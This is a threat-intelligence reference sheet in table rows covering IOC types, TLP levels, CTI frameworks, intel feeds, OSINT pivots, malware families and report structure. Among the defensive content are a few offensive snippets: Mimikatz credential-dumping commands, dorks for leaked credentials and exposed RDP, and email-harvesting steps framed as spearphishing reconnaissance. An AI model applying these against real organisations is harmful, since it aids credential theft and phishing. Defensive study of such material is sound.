| Registry Key | HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Malware | Common persistence location. Monitor with autoruns or Sysmon EventID 13. |
| Mutex | Global\{A3B2C1D4-...} | Malware creates mutexes to avoid double-infection. Unique per malware family — very reliable IOC. |
| JA3/JA3S Hash | 769,47-53-5-10-...,0-ff01-0010 | TLS client/server fingerprint. Identifies malware C2 even over HTTPS. Can false positive on shared libraries. |
| JARM Hash | 29d29d00029d29d00042d... | Active TLS fingerprint of servers. Identifies C2 infrastructure. Cobalt Strike has well-known JARM. |
| TLP:RED | For named recipients only. Cannot be shared further. Highest sensitivity — personal briefings, law enforcement. |
| TLP:AMBER | Share within your organization and with clients/customers on a need-to-know basis only. |
| TLP:AMBER+STRICT | Share within your organization only — do NOT share with clients or customers. |
| TLP:GREEN | Share within the wider community (security professionals, trusted ISACs). Not for public posting. |
| TLP:CLEAR | No restriction — may be shared publicly. Previously called TLP:WHITE. |
| Level | Indicator | Pain to Attacker if Blocked |
|---|---|---|
| 6 (Hardest) | TTPs (Tactics, Techniques, Procedures) | Tough — Forces attacker to change behavior entirely. Best long-term defense. |
| 5 | Tools (Mimikatz, Cobalt Strike, custom malware) | Challenging — Must rewrite or replace tools. |
| 4 | Network/Host Artifacts (mutex, registry keys, User-Agent) | Annoying — Must modify malware. |
| 3 | Domain Names | Annoying — Must register new domain (cheap but traceable). |
| 2 | IP Addresses | Easy — Change IP or use new VPS (minutes). |
| 1 (Easiest) | Hash Values | Trivial — Recompile or change one byte to get new hash. |
| Cyber Kill Chain (Lockheed) | Recon → Weaponization → Delivery → Exploitation → Installation → C2 → Actions on Objectives. Useful for campaign analysis and defense mapping. |
| Diamond Model | 4 features: Adversary ↔ Capability ↔ Infrastructure ↔ Victim. Pivoting on any edge reveals more about the others. Used for attribution and campaign clustering. |
| MITRE ATT&CK | Behavior-based framework of adversary TTPs. More granular than Kill Chain. Use for detection coverage mapping, red/blue team alignment, threat actor profiling. |
| STIX 2.1 | Structured Threat Information eXpression — JSON-based format for sharing CTI. Objects: Indicator, Observable, Malware, Campaign, Threat Actor, Attack Pattern, Course of Action, Relationship. |
| TAXII 2.1 | Trusted Automated eXchange of Intelligence Information — API protocol for distributing STIX content. Collections and channels. Supported by MISP, OpenCTI, ThreatQ. |
| MISP | Open-source threat intel platform. Events contain attributes (IOCs), galaxies (ATT&CK), objects, and sharing groups. REST API + PyMISP for automation. |
| Source | What It Provides |
|---|---|
| VirusTotal | File/URL/IP/domain reputation — aggregates 70+ AV engines + behavior sandbox. API available. |
| AlienVault OTX | Community IOC feeds — IPs, domains, hashes, pulses. Free API, STIX/TAXII support. |
| AbuseIPDB | Crowdsourced malicious IP database. Report and check IPs. API: api.abuseipdb.com |
| Shodan | Search engine for internet-exposed services and devices. Identify attacker infrastructure, exposed assets. |
| Censys | Similar to Shodan — certificate + banner search. Good for infrastructure attribution. |
| ThreatFox (abuse.ch) | IOC database: malware IPs/domains/URLs/hashes with malware family tags. Free API. |
| URLhaus (abuse.ch) | Malware distribution URLs. Updated hourly. Free download in CSV/JSON/MISP format. |
| MalwareBazaar (abuse.ch) | Malware sample sharing platform. Download samples, query by hash/tag/family. Free API. |
| CIRCL.lu Passive DNS | Historical DNS resolution records — see what IPs a domain resolved to over time. |
| OpenPhish / PhishTank | Active phishing URL feeds. Good for email security and SOC enrichment. |
| CISA KEV | Known Exploited Vulnerabilities catalog — CVEs actively exploited in the wild. Mandatory patching guide for US federal agencies, strong signal for everyone. |
| Sightings count | How many times an IOC was observed across sources — more sightings = higher confidence |
| Age of IOC | Stale IOCs (6+ months old IPs/domains) may be reused or reassigned — verify before blocking |
| False Positive Rate | Shared hosting IPs, CDN ranges (Cloudflare/AWS/Azure) — contain thousands of customers. Block at URL level, not IP. |
| Context enrichment | Always enrich: ASN owner, geo, hosting provider, passive DNS history, WHOIS age, community tags |
| Intel decay | IPs expire faster (days-weeks) than domains (weeks-months) than hashes (stable) than TTPs (months-years) |
| WHOIS lookup | whois domain.com — registrant, registrar, creation date, nameservers. Old domains = higher legitimacy signal |
| Passive DNS | Historical IP resolutions for a domain — CIRCL.lu, RiskIQ, Shodan. Pivot: what else resolved to this IP? |
| Certificate Transparency | crt.sh — all SSL certs issued for a domain. Find subdomains from cert SANs without active scanning |
| ASN lookup | bgp.he.net — find all IP ranges owned by an org or hosting provider. Identify attacker infrastructure patterns |
| Reverse IP lookup | Find all domains hosted on same IP — shared hosting pivot. Tools: VirusTotal, SecurityTrails, RiskIQ |
| Google dorks for intel | site:pastebin.com "company.com" — find leaked credentials, internal data, API keys in paste sites |
| LinkedIn OSINT | Employee names → email format guess (first.last@company.com) → credential stuffing or spearphish targets |
| Shodan dorks | org:"Company Name" port:3389 — find exposed RDP. ssl.cert.subject.cn:"domain.com" — find all their certs |
| Hunter.io / phonebook.cz | Email address discovery for a domain — useful for phishing simulation and breach impact assessment |
| theHarvester | theHarvester -d company.com -b google,bing,linkedin — aggregate OSINT from multiple sources |
| Family | Type | Key Characteristics |
|---|---|---|
| Cobalt Strike | C2 Framework | Beacon payload, malleable C2 profiles, team server. Legitimate pentest tool widely abused by threat actors. JARM fingerprint is well-known. |
| Emotet | Banking Trojan / Loader | Email-delivered, macro-based. Modular — loads TrickBot, QBot, ransomware. Survived takedown, re-emerged. Spreads via contact list harvesting. |
| QBot (Qakbot) | Banking Trojan / Loader | Thread-hijacking phishing emails, living-off-the-land, loads Black Basta/RansomHouse. Disrupted 2023 by FBI operation. |
| Mimikatz | Credential Tool | In-memory credential extraction from LSASS. sekurlsa::logonpasswords, kerberos::golden. Detected by most EDR; many alternatives exist. |
| WannaCry | Ransomware / Worm | NSA EternalBlue (MS17-010) exploit. Kill-switch domain registration stopped spread. Attributed to Lazarus Group (DPRK). Still active on unpatched systems. |
| BlackCat / ALPHV | RaaS | Rust-based ransomware, cross-platform (Windows/Linux/ESXi), triple extortion (encrypt + exfil + DDoS). Targeted MGM, Change Healthcare. |
| AgentTesla | RAT / Infostealer | Credential stealer targeting browsers, email clients, FTP clients. Delivered via phishing. C2 via SMTP/Telegram/FTP. |
| Sliver | C2 Framework | Open-source Go-based C2 alternative to Cobalt Strike. mTLS, WireGuard transport. Growing adoption by threat actors as CS alternative. |
| Executive Summary | 2-3 sentences: what happened, who is affected, what to do. Non-technical language. Business impact focus. |
| Key Findings | Bullet points of critical IOCs, TTPs used, affected systems. Link each TTP to MITRE ATT&CK ID. |
| Timeline | Chronological sequence of attacker activity in UTC. Include: initial access → persistence → lateral movement → impact. |
| IOC Table | Type | Value | Context | First Seen | Confidence. Include hash, IP, domain, URL with TLP marking. |
| ATT&CK Heatmap | Export Navigator layer showing all observed techniques — attach as appendix for blue team. |
| Recommendations | Prioritized: Immediate (block IOCs, patch CVE) → Short-term (detection rules) → Long-term (architecture changes). |
| TLP Marking | Mark every page header/footer and IOC table with appropriate TLP. Default to TLP:AMBER unless cleared for wider sharing. |
| References | Link to vendor advisories, CVE entries, prior campaign reports, MITRE ATT&CK technique pages. |